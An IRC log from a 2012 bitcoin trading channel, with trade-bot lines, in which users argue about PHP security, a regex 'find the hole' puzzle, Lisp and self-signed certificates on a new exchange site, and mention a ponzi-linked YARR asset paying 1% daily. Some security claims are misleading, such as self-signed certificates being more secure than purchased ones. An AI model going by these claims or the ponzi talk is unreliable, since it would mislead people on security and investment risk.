problem is Sep 05 02:50:16 you'd need some muscle to force people into obedience, as in, the special cornflakes that they are don't want to give you their code. Sep 05 02:50:16 people suck at code Sep 05 02:50:20 the platform doesnt fix this Sep 05 02:50:35 Diablo-D3: suppose the code has to be audited too Sep 05 02:50:37 Diablo-D3 you don't let them run it. you run it/ they just give you the code. Sep 05 02:50:50 mircea_popescu: erm Sep 05 02:50:53 so yes, this would be a solution, but you would need something bigger than currently available Sep 05 02:50:54 you didnt read what I wrote Sep 05 02:50:56 THE CODE SUCKS Sep 05 02:50:59 both in terms of fuck you power and in terms of btc Sep 05 02:51:01 full stop. Sep 05 02:51:09 Diablo-D3 well... yeah. that too. Sep 05 02:51:29 if the code sucks, it doesn't qualify for insurance Sep 05 02:51:31 guess what: you can write stable and secure php. Sep 05 02:51:34 is that so hard? Sep 05 02:51:37 smickles: YES Sep 05 02:51:45 if writing sane code was so easy, WE'D NEVER HAVE BUGS Sep 05 02:51:50 smickles you can say you're insuring ppl atm then lol Sep 05 02:51:56 just... nobody qualifies. Sep 05 02:52:03 I mean fuck Sep 05 02:52:11 it took me about 4 months to write an STM impl that wasnt shit Sep 05 02:52:18 and I still cant prove if its 100% correct Sep 05 02:52:33 so there is no code good enough to even build an actuarial model around? Sep 05 02:52:37 I just know that every attempt Ive made to smash it has failed or lead to bugs that were fixed Sep 05 02:52:39 I prove code all the time Sep 05 02:52:42 smickles possibly not. we don't know. Sep 05 02:52:50 is the fair answer. maybe there is. Sep 05 02:52:57 we're too new and for the largest majority, too stupid. Sep 05 02:53:01 granted, much simpler code than an STM impl :) Sep 05 02:53:03 copumpkin: bullshit, you'd have to use a language specifically for that Sep 05 02:53:08 Diablo-D3: and I do Sep 05 02:53:08 he does. Sep 05 02:53:10 theres only like three languages for that Sep 05 02:53:11 ahaha Sep 05 02:53:20 and you cant even name one. Sep 05 02:53:26 lettuce see this. Sep 05 02:53:29 agda, coq, idris, epigram, Sep 05 02:53:31 name one ahaha Sep 05 02:53:39 using wikipedia is cheating. Sep 05 02:53:40 let's see Sep 05 02:53:40 twelf Sep 05 02:53:44 Diablo-D3: seriously? Sep 05 02:53:44 [GLBSE] [TYGRR.BOND-P] 4 @ 0.099999 = 0.4 BTC [+] Sep 05 02:53:47 BUT DO YOU KNOW WHAT ITO INTEGRALS ARE Sep 05 02:53:51 Diablo-D3: I do this shit in my free time Sep 05 02:53:52 haha Sep 05 02:54:00 https://github.com/copumpkin/categories/tree/master/Categories Sep 05 02:54:05 I have thousands of lines of code of agda Sep 05 02:54:08 mircea_popescu: ooh! ooh! I know what intergrals are! THEY ARE NIGHTMARE CONSTRUCTS SPAWNED BY EVIL MATH TEACHERS Sep 05 02:54:10 plastered all over my github Sep 05 02:54:24 Diablo-D3 i was referencing a speciffic discussion, i think you weren't here. Sep 05 02:54:29 oh Sep 05 02:54:34 copumpkin: feh Sep 05 02:54:35 copumpkin so why don't you write an exchange ? Sep 05 02:54:41 still, go ahead and write a provable stm impl\ Sep 05 02:54:45 it aint happening Sep 05 02:54:50 I was tempted to, and started working on it :) Sep 05 02:54:52 the exchange one Sep 05 02:54:53 its ugly bastard code that I am not entirely pleased with Sep 05 02:54:54 STM is hard Sep 05 02:54:54 hehe kinda stepped in it Diablo-D3 huh Sep 05 02:54:56 and I'm not going to try Sep 05 02:55:01 STM is extra fucking hard Sep 05 02:55:10 I'd need to build concurrency models first Sep 05 02:55:13 maybe in 20 years I can replace it with hardware stm Sep 05 02:55:14 because these languages give you very few primitives Sep 05 02:55:19 so you need to build most things from scratch Sep 05 02:55:22 HTM! Sep 05 02:55:38 not completely htm Sep 05 02:55:45 Lets play a game Sep 05 02:55:49 Fix the security hole: Sep 05 02:55:50 function makealpha($s){ Sep 05 02:55:50 $r = preg_replace('/[^a-zA-Z0-9]/i', '', $r); Sep 05 02:55:50 return ($r); } Sep 05 02:55:55 complex hardware sychronization that fixes most of the .... Sep 05 02:55:59 usagi: weatkhalrjhwrlarjarlroufjojawr Sep 05 02:56:07 lol Sep 05 02:56:12 [GLBSE] [OBSI.HRPT] 19 @ 0.1021 = 1.9399 BTC [+] Sep 05 02:56:21 $r? Sep 05 02:56:31 Ok that was level 1 Sep 05 02:56:34 Now here's level 2 Sep 05 02:56:37 function makealpha($s){ Sep 05 02:56:37 $r = preg_replace('/[^a-zA-Z0-9]/i', '', $s); Sep 05 02:56:37 return ($r); } Sep 05 02:56:48 LWKJERKLARJARJARJAKJADKAWE Sep 05 02:56:52 lol Sep 05 02:56:59 This obviously has blown Diablo-D3's mind. Sep 05 02:57:23 doesnt php even have a fucking function for that Sep 05 02:57:25 usagi: so you have a function makealpha that removes all alpha? Sep 05 02:57:39 Yes Sep 05 02:57:42 hmm okay Sep 05 02:57:43 But there's a security hole. Sep 05 02:57:56 there is a security hole BECAUSE SOMEONE THOUGHT REGEX WAS A GOOD IDEA Sep 05 02:58:07 its bad enough I can do that kind of shit in perl Sep 05 02:58:11 um Sep 05 02:58:13 why do you need /i? Sep 05 02:58:13 regex is a good ideea if you don't allow FUCKEN CHINESE BS CHARS Sep 05 02:58:16 its an even worse idea to use php. for anything. at all. Sep 05 02:58:27 No, that's not it Diablo. Sep 05 02:58:31 mircea_popescu: I can make secure unicode apps Sep 05 02:58:34 There's a very real problem with the makealpha function Sep 05 02:58:41 usagi: then dont use it. Sep 05 02:58:45 match what you allow, don't remove what you don't want. Sep 05 02:58:45 lol Sep 05 02:58:56 oh Sep 05 02:59:10 Obsi: that only partially describes how ugly that regex is Sep 05 02:59:31 If you can point out the security flaw I will hire you as my pen tester :p Sep 05 02:59:36 I'm getting hungry... Sep 05 03:00:12 Weird how I can't just stay 24/7 watching the bitcoin markets. Sep 05 03:00:12 so bitfloor was making 200 btc a month. Sep 05 03:00:18 usagi: I just did. thats php. Sep 05 03:00:18 Well off I go Sep 05 03:00:24 listen, this is the reason there's not many decent exchanges. 2k a month ? srsly ? Sep 05 03:00:26 by default thats the one and only security flaw I need to know. Sep 05 03:00:28 that's what, minimum wage. Sep 05 03:00:44 mircea_popescu: writing an exchange is easy Sep 05 03:00:46 Diablo thats nice but that's not the flaw Sep 05 03:00:53 usagi: that is 100% the flaw Sep 05 03:01:07 Yeah but you don't know anything about computer security Sep 05 03:01:11 if I ran an insurance company and I had to audit code, anything written in php automatically fails. Sep 05 03:01:15 HAHAHAHAHAHAHAHHA Sep 05 03:01:16 oh man Sep 05 03:01:17 What would you suggest -- cgi? lol Sep 05 03:01:27 no, he writes in java. Sep 05 03:01:33 mircea_popescu: nope Sep 05 03:01:37 that ship saled. Sep 05 03:01:39 what do you use ? Sep 05 03:01:42 back to C I went, Sep 05 03:01:45 o Sep 05 03:01:52 I always end up back at C Sep 05 03:01:53 PHP is pretty much enterprise class Sep 05 03:02:00 its the only language I can truly express myself in Sep 05 03:02:06 usagi: bull fucking shit Sep 05 03:02:11 PHP is more popular than perl, ruby, lisp, erlang and haskell all rolled into one Sep 05 03:02:11 what planet have you been living on Sep 05 03:02:19 popular != secure. Sep 05 03:02:25 The planet where people have reasons for what they believe in? Sep 05 03:02:30 lol Sep 05 03:02:34 You are so big on PH{' Sep 05 03:02:39 PHP's security flaws -- okay, so, Sep 05 03:02:42 whats the flaw? Sep 05 03:02:44 Point it out Sep 05 03:02:58 usagi: read the php release changelogs for the past 5 years. Sep 05 03:03:04 next! Sep 05 03:03:24 and also, where is php actually popular? its not in the enterprise. Sep 05 03:03:31 as much as I hate java, java is. Sep 05 03:03:35 http://www.securityweek.com/working-patch-php-security-flaw-be-released-tuesday Sep 05 03:03:36 :( Sep 05 03:03:38 he has a good point lol Sep 05 03:03:54 "On Tuesday, the PHP Group plans to release new versions of PHP in order to address the problems with a previous patch, which was intended to close a security problem." and on it goes. Sep 05 03:04:10 Do you know what the security problem is? Sep 05 03:04:17 mircea_popescu: fuckception Sep 05 03:04:30 oh my fucking god, people still use php with cgi? Sep 05 03:04:31 the fuck Sep 05 03:04:36 usagi: just a wild guess, would that function fubar when regex special characterw were used? Sep 05 03:04:41 Nope. Sep 05 03:04:41 php has a fucking fastcgi handler, jesus fucking christ Sep 05 03:04:49 >D Sep 05 03:04:50 “When PHP is used in a CGI-based setup (such as Apache's mod_cgid)..." Sep 05 03:05:02 So in othr words, it does not apply to modern PHP installations Sep 05 03:05:19 [GLBSE] [PUREMINING] 2 @ 0.09566999 = 0.1913 BTC [+] Sep 05 03:05:25 usagi: go use erlang Sep 05 03:05:32 Why? Sep 05 03:05:41 See this is so endemic Sep 05 03:05:57 I say, find the flaw, and you can't.. but instead of just asking, you bullshit about how the entire language is insecure Sep 05 03:06:17 As proof you bring up the fact that they fix security holes as they are found Sep 05 03:06:53 IIRC solaris had a security hole in sendmail until like, 6 months ago Sep 05 03:06:58 sendmail Sep 05 03:07:08 I guess that means we can't use unix Sep 05 03:07:17 usagi: the flaw is you're using that regex on user input in a function named "makealpha" Sep 05 03:07:24 [GLBSE] [BTCMC] 7 @ 0.5023 = 3.5161 BTC [-] Sep 05 03:07:25 [GLBSE] [BTCMC] 9 @ 0.5022 = 4.5198 BTC [-] Sep 05 03:07:26 [GLBSE] [BTCMC] 10 @ 0.5016 = 5.016 BTC [-] Sep 05 03:07:33 You're getting warmer Sep 05 03:07:50 no, this is what I said near the top. Sep 05 03:07:59 But you were wrong there. Sep 05 03:08:01 [GLBSE] [BTCMC] 2 @ 0.5897 = 1.1794 BTC [+] Sep 05 03:09:20 usagi: so explain to me, again, why you're not using strtoupper with your locale force set to a unicode one? Sep 05 03:09:31 But anyways you mentioned Erlang Sep 05 03:09:31 I am intrigued by their programming specificatoins Sep 05 03:09:54 Why should I learn Erlang? Sep 05 03:10:00 And... what about Haskell? Sep 05 03:10:24 I've been meaning to learn Python actually, because of armory Sep 05 03:10:30 [07:56:36] $r = preg_replace('/[^a-zA-Z0-9]/i', '', $s); Sep 05 03:10:35 why are you using ^ anyhow? Sep 05 03:10:42 haskell is shit Sep 05 03:10:46 replace all nonalphanumeric with empty Sep 05 03:10:55 copumpkin: thats not what ^ means. Sep 05 03:11:03 in a character class it is Sep 05 03:11:12 ^ means everything except Sep 05 03:11:14 in this case Sep 05 03:11:23 yes, ^ in the set negates the set Sep 05 03:11:48 Well I will show you the solution Sep 05 03:11:51 since I gotta go Sep 05 03:11:59 cool Sep 05 03:12:05 I can very easily produce a string that will produce an empty string with that regex Sep 05 03:12:20 function makealpha($s){ Sep 05 03:12:20 $r = substr($s, 0, 1024); Sep 05 03:12:20 $r = preg_replace('/[^a-zA-Z0-9]/i', '', $r); Sep 05 03:12:20 return ($r); } Sep 05 03:12:48 usagi: you're giving a shit about string size on a dynamic language? Sep 05 03:12:59 lol theres a buffer overflow in preg_replace Sep 05 03:13:04 it will crash the system and maybe worse Sep 05 03:13:10 um, dude Sep 05 03:13:15 if there is a buffer overflow in preg_replace Sep 05 03:13:20 you dont fix it in YOUR code Sep 05 03:13:20 ahahaha Sep 05 03:13:23 you fix it upstream Sep 05 03:13:24 he wants to know why php is insecure Sep 05 03:13:25 fucking moron Sep 05 03:13:27 learn to code Sep 05 03:13:32 mircea_popescu: yeah no fucking shit Sep 05 03:13:34 he was sitting on one Sep 05 03:13:40 for the record : Sep 05 03:13:40 usagi: fuck you dude, learn to code Sep 05 03:13:41 now exploit it! Sep 05 03:13:43 mircea_popescu: dont you use php? Sep 05 03:13:48 there WAS A buffer overlfow in php preg replace cca 2005 Sep 05 03:13:54 i doubt it very much it's still there. Sep 05 03:13:57 I just showed you a) you don't know what the insecurities are b) you don't know how to fix them Sep 05 03:14:04 I'm not the one that needs ot learn to code bro Sep 05 03:14:08 usagi: you didnt show me anything Sep 05 03:14:08 nefario sure, i have wordpress Sep 05 03:14:14 _I dont use php because its not secure_ Sep 05 03:14:17 that solves 100% of the issue. Sep 05 03:14:20 whats mpex coded in? Sep 05 03:14:21 Yeah and thats another thing, mpex is php Sep 05 03:14:22 usagi: admittedly, asking for idiosyncrasies of particular versions of a specific language isn't exactly testing our security knowledge :) Sep 05 03:14:22 lol Sep 05 03:14:33 does perl have the same problem? no. does ruby? no. does java? no. Sep 05 03:14:42 does python? probably not. Sep 05 03:14:47 I was just trolling diablo Sep 05 03:14:51 lol, java has it's own problems Sep 05 03:14:51 java surely. Sep 05 03:14:52 Diablo-D3: all those languages have their own issues Sep 05 03:15:06 nefario: yes, but not a core language feautre having a buffer overflow. Sep 05 03:15:08 mpex is coded in Java? Sep 05 03:15:17 thats something only php could do. Sep 05 03:15:18 mpex is coded in malbolge Sep 05 03:15:22 C C++ Sep 05 03:15:25 [GLBSE] [FPGAMINING] 1 @ 0.7299 BTC [+] Sep 05 03:15:28 lol. the public face is php. mpex actually runs on lisp. Sep 05 03:15:34 w00t Sep 05 03:15:39 you knew this Sep 05 03:15:46 nope, I knew that mpoe did Sep 05 03:15:47 buffer overflow is a core feature of C C++ Sep 05 03:15:50 :) Sep 05 03:15:53 copumpkin well doh Sep 05 03:15:56 mircea_popescu: you use lisp? Sep 05 03:15:59 There were still holes in malloc and free being used until early this year IIRC Sep 05 03:16:00 lithp Sep 05 03:16:00 like emacs lisp? Sep 05 03:16:08 emacs lisp has shitty scoping Sep 05 03:16:15 don't use it! Sep 05 03:16:25 tell RMS to eat more toe junk Sep 05 03:16:36 will do Sep 05 03:16:44 but don't know if he'll hear me Sep 05 03:16:46 lmao Sep 05 03:16:50 guy has hearing problems Sep 05 03:16:58 last time I tried talking to him Sep 05 03:16:58 [GLBSE] [CPA] 4 @ 0.059 = 0.236 BTC [-] Sep 05 03:16:59 attack him with a cactus. Sep 05 03:17:00 don't buy him a parrot Sep 05 03:17:04 he started shouting at me Sep 05 03:17:16 mircea_popescu: which version of lisp? Sep 05 03:17:16 my colleague saw him on the subway home this evening Sep 05 03:17:24 lisp? Sep 05 03:17:25 nefario i haven't released that sort of details. Sep 05 03:17:33 night all Sep 05 03:17:34 That explains everything. Sep 05 03:17:36 nn Sep 05 03:17:38 I get it now Sep 05 03:17:46 mircea is a lisp programmer :) Sep 05 03:17:51 usagi nope, i don't code. Sep 05 03:18:07 mircea_popescu hired a lisp programmer? Sep 05 03:18:19 where ever did you find one? Sep 05 03:18:25 i know people. Sep 05 03:18:37 [GLBSE] [NASTY] 3 @ 0.62869 = 1.8861 BTC [+] Sep 05 03:18:42 Is mpex really written in lisp? Sep 05 03:18:43 I know people too, and none of them use lisp professionally Sep 05 03:18:47 yes Sep 05 03:18:50 apparently Sep 05 03:18:52 there's not so many of them,. Sep 05 03:18:56 thats pretty sad lol Sep 05 03:19:00 No wonder he can't maintain it Sep 05 03:19:14 ? Sep 05 03:19:15 usagi are you a little nuts, srslty now. Sep 05 03:19:30 the site was never down. ever. wtf are you on about. Sep 05 03:19:39 usagi: lisp in and of itself is not a problem Sep 05 03:19:40 [MPEX] [S.MPOE] 9341 @ 0.00040166 = 3.7519 BTC [+] Sep 05 03:19:47 No it's that no one knows it Sep 05 03:19:49 mircea_popescu: you need people to use the site to notice its down Sep 05 03:19:58 gah, again with the shit. Sep 05 03:20:04 get some uysers, then we can talk nefario Sep 05 03:20:06 srsly now. Sep 05 03:20:06 I almost developed some respect for mircea_popescu Sep 05 03:20:07 If I had 3 bids and one of them was lisp I could tell you what the most expensive bid was without even looking Sep 05 03:20:12 on hearing it was in lisp Sep 05 03:20:19 but he doesn't code it himself Sep 05 03:20:33 that's possibly the worst criteria to decide who to respect. Sep 05 03:20:41 so respect lost Sep 05 03:20:46 well Sep 05 03:20:47 Programming in lisp is a lot like programming in 8088 assembly language. Sep 05 03:20:48 never gained Sep 05 03:20:52 you should respect me because you had a market you were shitting all over for a year Sep 05 03:20:54 no lisp is nice Sep 05 03:20:56 and i took it from you in a few months. Sep 05 03:20:59 You have to think like you're coding for 50 year old hardware Sep 05 03:20:59 lol @ this discussion Sep 05 03:21:01 that'd be something to respect. Sep 05 03:21:08 and admittedly, learn a few things from. Sep 05 03:21:19 it's just the implenetations of it are no fun to use in production environments Sep 05 03:21:21 Spoken like a true ruby evangelist nef :) Sep 05 03:21:25 reddit started off in lisp Sep 05 03:21:33 but they had to move to python because of threading issues Sep 05 03:21:40 this is why I use haskell Sep 05 03:21:45 >_> Sep 05 03:21:54 copumpkin: respeck Sep 05 03:22:01 and I don't even have to write my own STM impl Sep 05 03:22:04 cause GHC already has one :D Sep 05 03:22:06 lmao Sep 05 03:22:07 [GLBSE] [BAKEWELL] 1 @ 0.14999 BTC [-] Sep 05 03:22:17 :) Sep 05 03:22:18 Diablo-D3 just did it cause he's a programmer at heart, wants the challenge. Sep 05 03:22:24 I very much enjoy playing around with lisp Sep 05 03:22:26 I like challenges too Sep 05 03:22:30 i don't. Sep 05 03:22:32 but I leave it at that Sep 05 03:22:35 playing Sep 05 03:22:45 [GLBSE] [FDBF] 1 @ 0.14999999 BTC [+] Sep 05 03:22:49 when you start heading towards production Sep 05 03:22:58 you rely more on libraries etc. Sep 05 03:23:04 good libraries are important Sep 05 03:23:07 yup Sep 05 03:23:14 list was fantastic at the start of the web Sep 05 03:23:19 [GLBSE] [BITCOINRS] 1 @ 0.05 BTC [-] Sep 05 03:23:20 when there were no libraries Sep 05 03:23:22 only CGI Sep 05 03:23:25 or whatever Sep 05 03:23:27 i don't trust any libraries. Sep 05 03:23:46 [GLBSE] [GMVT-BOT] 1 @ 0.1689 BTC [+] Sep 05 03:23:50 well mircea_popescu, better throw out the GPG lib you're using and write your own Sep 05 03:24:05 while you're at it Sep 05 03:24:19 write your own libc if you don't trust libraries Sep 05 03:24:27 but now days Sep 05 03:24:29 if i were to run an exchange on it, yes, i would. Sep 05 03:24:49 perl, ruby, python have so many great libraries Sep 05 03:24:55 and application stacks Sep 05 03:25:11 there is no advantage in using lisp anymore Sep 05 03:25:12 mircea_popescu has libraries, of porn Sep 05 03:25:15 !!! Sep 05 03:25:18 lol Sep 05 03:25:22 now those, those i trust. Sep 05 03:26:06 the best implementation of lisp that I've found Sep 05 03:26:08 I'm a Java programmer. I am writing the backend for my exchange in java. Sep 05 03:26:12 at least a free one Sep 05 03:26:30 is clisp Sep 05 03:26:35 ok it doesn't do threading Sep 05 03:26:36 Clipse Sep 05 03:26:37 usagi: you arn't afraid of how often java exploits seem to happen? Sep 05 03:26:44 but it's pretty reliable Sep 05 03:26:50 There are exploits everywhere Sep 05 03:26:59 Even ruby has gaping security holes all over it Sep 05 03:27:08 usagi: yes, but java is a pretty big target Sep 05 03:27:10 There's nothing in any language that will prevent security holes Sep 05 03:27:14 [GLBSE] [FDBF] 10 @ 0.14999999 = 1.5 BTC [+] Sep 05 03:27:21 [GLBSE] [FDBF] 10 @ 0.14999999 = 1.5 BTC [+] Sep 05 03:27:30 the idea is to minimize the opportunities for them Sep 05 03:27:30 You can't mitigate security by choosing a language Sep 05 03:27:32 not prevent Sep 05 03:27:32 use brainfuck Sep 05 03:27:50 it's only got like Sep 05 03:27:52 the vast majority of security holes arise from a couple of features that many language simply omit Sep 05 03:27:52 usagi is making an exchange ? Sep 05 03:27:53 Security is about compartmentalization Sep 05 03:27:53 20 characters Sep 05 03:27:59 how hard can it be? Sep 05 03:28:02 rg knows what he is talking about -- he said, he runs everything in VMs Sep 05 03:28:13 I know what I'm talking about, too :) Sep 05 03:28:15 so that if a service gets compromised they can't get out of the vm Sep 05 03:28:28 no no no Sep 05 03:28:29 guys Sep 05 03:28:34 youre doing it all wrong Sep 05 03:28:38 only way to be secure Sep 05 03:28:43 unplug Sep 05 03:28:46 is to write it in CPP Sep 05 03:28:50 lol Sep 05 03:29:05 then you can ensure there are no holes in your code Sep 05 03:29:07 Yeah mircea of coruse I am making an exchange. Sep 05 03:29:09 most security bugs in the wild arise from buffer overflows or format string vulns Sep 05 03:29:15 of course you are making an exchange ? Sep 05 03:29:17 the latter of which is particularly stupid Sep 05 03:29:18 https://hotwallet.ca/xc/orderbook.php Sep 05 03:29:27 because it comes from a feature in format strings that nobody ever even uses, except for exploits Sep 05 03:29:53 damn guys Sep 05 03:30:01 and now Im after installing clisp Sep 05 03:30:07 oh and I guess sql injections Sep 05 03:30:07 usagi your security scheme is wrong on that site. Sep 05 03:30:10 distracting me like that Sep 05 03:30:18 all of which can be solved by language design decisions Sep 05 03:30:27 Can you point out how it is wrong? Sep 05 03:30:39 mircea_popescu: do you code...at all? Do you even know how? Sep 05 03:30:47 yeah, your cert doesn't exactly match the domain Sep 05 03:31:00 nefario sure, i can code, i'm not mentally retarded. Sep 05 03:31:08 it just doesn't pay enough for my time. Sep 05 03:31:08 What does the cert say Sep 05 03:31:30 it's a self-signed root that doesn't match the domain Sep 05 03:31:37 --2012-09-05 03:31:27-- https://hotwallet.ca/xc/orderbook.php Sep 05 03:31:37 Resolving hotwallet.ca... 199.48.69.241 Sep 05 03:31:37 Connecting to hotwallet.ca|199.48.69.241|:443... connected. Sep 05 03:31:37 ERROR: cannot verify hotwallet.ca's certificate, issued by `/O=hotwallet/OU=hotwallet/CN=199.48.69.241': Sep 05 03:31:37 Self-signed certificate encountered. Sep 05 03:31:37 ERROR: certificate common name `199.48.69.241' doesn't match requested host name `hotwallet.ca'. Sep 05 03:31:43 but during development, it's fairly common to not pay for a real one :) Sep 05 03:31:46 That's my IP. Sep 05 03:31:51 yeah Sep 05 03:31:55 Beyond that Sep 05 03:31:56 self signed cert Sep 05 03:31:59 no biggie Sep 05 03:32:03 buying certs opens you up to MITM attacks. Sep 05 03:32:18 Self-signed and self-published certs are more secure than ones you buy online Sep 05 03:32:27 usagi: self-signed certs defeat the purpose of the system Sep 05 03:32:30 Yupyup they sell mitm boxes to the feds Sep 05 03:32:32 No Sep 05 03:32:38 so then why not jsut quote as ip ? Sep 05 03:32:38 The point is that the communication is encrypted Sep 05 03:32:39 might as well use uncertified diffie-hellman Sep 05 03:32:41 or why not sign as domain ? Sep 05 03:32:41 yeah Sep 05 03:32:44 you can do that without a certificate Sep 05 03:32:47 the certificate is about identity Sep 05 03:33:15 [GLBSE] [MU] 2 @ 0.39 = 0.78 BTC [-] Sep 05 03:33:20 TLS provides two features: authenticating your peer, and encryption Sep 05 03:33:30 the certificates (possibly even client-side, in some systems) provide auth Sep 05 03:33:37 encryption stops eavesdropping Sep 05 03:33:41 copumpkin: i plan to self sign my cert, and publish clearsigned info so that users can verify my sig and import the cert Sep 05 03:33:42 the point here is : either give the link as https://199.48.69.241/xc/orderbook.php or else change the cert to use the domain not the ip. Sep 05 03:33:56 Then use 2fa Sep 05 03:33:59 there by getting encryption and identity Sep 05 03:34:00 Sign in with a yubikey Sep 05 03:34:08 is that to me? Sep 05 03:34:21 I'm setting it up so you can't do anything without 2fa Sep 05 03:34:23 usagi: the point is, if you use a self-signed cert, someone else can pose as your site, and nobody will know Sep 05 03:34:27 send with yubikey, etc. Sep 05 03:34:44 once they pose as your site Sep 05 03:34:51 they can act as a middleman and forward requests to your real site Sep 05 03:34:54 and steal your info Sep 05 03:35:06 or just not even bother doing that Sep 05 03:35:11 But if I publish my own cert Sep 05 03:35:19 then you can verify if it is me or not :) Sep 05 03:35:21 sure, you'd attach it to some other notion of identity Sep 05 03:35:29 but the vast majority of your users aren't going to know that Sep 05 03:35:31 or bother checking Sep 05 03:35:37 that's why central cert auths are worthwhile Sep 05 03:35:59 i'd say "that's why https is useless for btc" Sep 05 03:36:01 Now there's a scam if I ever saw one Sep 05 03:36:04 if the user doesn't care about connecting to the real site... Sep 05 03:36:05 I might go out of my way to add your cert to my trusted set Sep 05 03:36:06 100 dollars for .... nothing Sep 05 03:36:08 brb Sep 05 03:36:10 no, it isn't nothing Sep 05 03:36:14 also, even if you do self-sign Sep 05 03:36:17 don't just use the root directly Sep 05 03:36:24 store the root somewhere else, and have it sign a sub-cert Sep 05 03:36:31 and then make the site use the sub-cert Sep 05 03:36:39 usagi is yarr jumping to a differnt ponzi and is the 1% for yarr garanteed each day? Sep 05 03:36:43 this is a good ideea, tho in general https is still useless. Sep 05 03:37:09 like if i get it, will you be sure i get 1% each day other than sunday? Sep 05 03:37:30 what's wrong with sunday? Sep 05 03:37:40 no tits on sunday. Sep 05 03:37:46 yarr never paid on sunday Sep 05 03:38:21 [GLBSE] [GSDPT] 30 @ 0.003393 = 0.1018 BTC [+] Sep 05 03:40:53 incidentally : i have no ideea how people imagine those cert scams make any money Sep 05 03:41:03 what with only allowing people that pay to have centralised certificates. Sep 05 03:41:17 it should be free and they should recoup costs from advertising or something. Sep 05 03:42:03 [GLBSE] [OBSI.HRPT] 200 @ 0.1042999 = 20.86 BTC [+] Sep 05 03:43:05 [GLBSE] [BIF.1YR.LOAN] 10 @ 0.94230769 = 9.4231 BTC [+] Sep 05 03:44:48 [GLBSE] [NYAN.C] 9 @ 0.75 = 6.75 BTC [+] Sep 05 03:45:22 [GLBSE] [NYAN.C] 6 @ 0.76 = 4.56 BTC [+] Sep 05 03:47:12 gnight girls Sep 05 03:48:52 [GLBSE] [NYAN.C] 1 @ 0.76 BTC [+] Sep 05 03:49:32 [GLBSE] [TYGRR.BOND-B] 5 @ 0.095 = 0.475 BTC [-] Sep 05 03:49:34 [GLBSE] [TYGRR.BOND-B] 250 @ 0.095 = 23.75 BTC [-] Sep 05 03:49:35 [GLBSE] [TYGRR.BOND-B] 75 @ 0.1 = 7.5 BTC [+] Sep 05 03:50:15 [GLBSE] [BDT] 1 @ 1.1 BTC [-] Sep 05 03:52:19 [GLBSE] [NYAN.C] 2 @ 0.76 = 1.52 BTC [+] Sep 05 03:52:22 [MPEX] [O.BTCUSD.C010T] 823 @ 0.90562136 = 745.3264 BTC [-] Sep 05 03:52:48 [GLBSE] [BAKEWELL] 1 @ 0.15 BTC [+] Sep 05 03:53:45 In case it's not clear to the dimwit collectivists, the "creditors who essentially have an open and shut case when it comes to a lawsuit" are we who have USD held by BitFloor, not the magical internetnerd token owners. Sep 05 03:53:49 the bitfloor thread is really great. Sep 05 03:54:38 [GLBSE] [CHEAPERINBITCOINS-STOCKS] 1 @ 0.28999 BTC [+] Sep 05 03:55:44 goat; nope, YARR is not jumping to a different ponzi. Sep 05 03:56:15 As for the 1%, that part of the contract doesn't change; it's a pass-thru. Kind of like how tygrr.bond-pi stopped paying interest when pirate did Sep 05 03:56:36 I wonder what the market will price it at this timre Sep 05 03:57:03 Oh the other issue is, Nefario hasn't approved (or disapproved) of it yet Sep 05 03:57:16 It might not list for a while Sep 05 03:57:31 [GLBSE] [YARR] 4 @ 1.0635 = 4.254 BTC [+] Sep 05 03:57:33 [GLBSE] [YARR] 1 @ 1.063 BTC [-] Sep 05 03:57:34 [GLBSE] [YARR] 20 @ 1.05 = 21 BTC [-] Sep 05 03:57:36 [GLBSE] [YARR] 1 @ 1.04 BTC [-] Sep 05 03:57:37 [GLBSE] [YARR] 10 @ 1.02 = 10.2 BTC [-] Sep 05 03:57:38 [GLBSE] [YARR] 20 @ 1.00001 = 20.0002 BTC [-] Sep 05 03:57:39 [GLBSE] [YARR] 15 @ 1.00000003 = 15 BTC [-] Sep 05 03:57:39 [GLBSE] [YARR] 10 @ 1.00000002 = 10 BTC [-] Sep 05 03:57:47 [GLBSE] [PPT.A] 65 @ 0.31 = 20.15 BTC [-] Sep 05 03:57:48 [GLBSE] [PPT.A] 100 @ 0.32 = 32 BTC [+] Sep 05 03:58:28 [GLBSE] [YARR] 19 @ 1 = 19 BTC [-] Sep 05 03:58:56 http://www.youtube.com/watch?v=F7SsavHX6tc let us all take a moment to review this Sep 05 03:59:08 [GLBSE] [PPT.B] 100 @ 0.311 = 31.1 BTC [+] Sep 05 03:59:09 [GLBSE] [PPT.B] 100 @ 0.32 = 32 BTC [+] Sep 05 04:00:22 I hope that wasn't you sellin YARR, goat Sep 05 04:02:47 selling yarr to buy ppt yay Sep 05 04:03:09 :) Sep 05 04:03:17 i was not selling yarr Sep 05 04:05:42 So um now that I am back Sep 05 04:05:49 [GLBSE] [NYAN.C] 1 @ 0.76 BTC [+] Sep 05 04:05:57 Mircea, you said my site's security was bad or something? what did you see Sep 05 04:06:13 i said you should either sign with the domain name or else quote the link with the ip in it Sep 05 04:06:22 oh right Sep 05 04:06:23 and copumpkin gave you the very useful advice of not signing with the root Sep 05 04:06:33 which i wouldn't have bothered, cause you frankly aren;t worth it. Sep 05 04:06:37 What do you think of the actual site? Sep 05 04:06:47 i didn't go further than that. Sep 05 04:07:11 So you don't actually have any problem with the site. Ok cool, I'll quote you on that ;) Sep 05 04:07:26 [GLBSE] [FDBF] 2 @ 0.14999999 = 0.3 BTC [+] Sep 05 04:07:30 Mircea said he cannot see any security flaws or problems with my site ^^ Sep 05 04:07:32 Yay Sep 05 04:10:45 [GLBSE] [ASICMINER] 5 @ 0.1366 = 0.683 BTC [-] Sep 05 04:22:13 nick JWU42 Sep 05 04:22:16 err Sep 05 04:35:56 [GLBSE] [PUREMINING] 1 @ 0.09567 BTC [+] Sep 05 04:36:32 ahahaha this takes the cake : ppl wanting to do a 75k btc ipo on glbse for a bankrupt company Sep 05 04:36:57 it used to make ~2k a year before going bust, so this would be a P/E of ... 33 Sep 05 04:37:18 satoshi dice ipoing at a P/E of 10 was however much too expensive in the oppinion of the same financial wizards. Sep 05 04:38:05 i guess evoorhees should bankrupt first, then it'll be also a great ipo. buncha idiots these people. Sep 05 04:38:56 [GLBSE] [TYGRR.BOT] 1 @ 1 BTC [+] Sep 05 04:39:09 [GLBSE] [BTC-BOND] 3 @ 0.0099998 = 0.03 BTC [-] Sep 05 04:39:33 [GLBSE] [TYGRR.BOT] 2 @ 1.01 = 2.02 BTC [+] Sep 05 04:39:54 why are people buying tygrr bot!!!! Sep 05 04:39:56 [GLBSE] [TYGRR.BOT] 1 @ 1.04 BTC [+] Sep 05 04:40:05 og fuck,,,, Sep 05 04:40:10 Are you planning on buying it back goat? Sep 05 04:40:22 at .91 or 